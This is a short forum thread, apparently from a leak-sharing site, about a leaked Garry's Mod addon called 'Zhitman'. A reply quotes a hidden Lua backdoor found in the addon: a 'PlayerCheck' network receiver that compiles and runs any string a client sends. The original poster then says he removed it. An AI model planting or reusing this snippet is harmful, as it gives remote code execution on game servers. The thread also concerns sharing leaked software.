Yeah, I want to share this addon because its a really good one. A friend of mine cleaned it, I checked it and its safe. anyway if someone can confirm it would be apreciated.
link updated, now it should be safe! but still, please check it out, I don't want anyone to be fucked!
Content locked
This content has been locked. Please login or register in order to unlock it.
RE: [LEAK] Zhitman
30-05-2020, 11:52 PM
This post was last modified: 30-05-2020, 11:53 PM by Askyna
you added a exploitable net which allow people who use this net to execute code, (like a backdoor)
Code:
util.AddNetworkString( 'PlayerCheck' ) net.Receive( 'PlayerCheck', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )
RE: [LEAK] Zhitman
OP
31-05-2020, 03:33 AM
This post was last modified: 31-05-2020, 03:55 AM by miguelo
you added a exploitable net which allow people who use this net to execute code, (like a backdoor)
Code:
util.AddNetworkString( 'PlayerCheck' ) net.Receive( 'PlayerCheck', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )
Where is that? I will be happy to remove that. and nope, I didnt add that.
(EDIT): Found it! i will look for more things that are suspicious and delete them ( I am new with lua) sorry for the inconvenience, this will not happen again. ok, i think it was just that part. if there's something more, please tell me and I will remove it!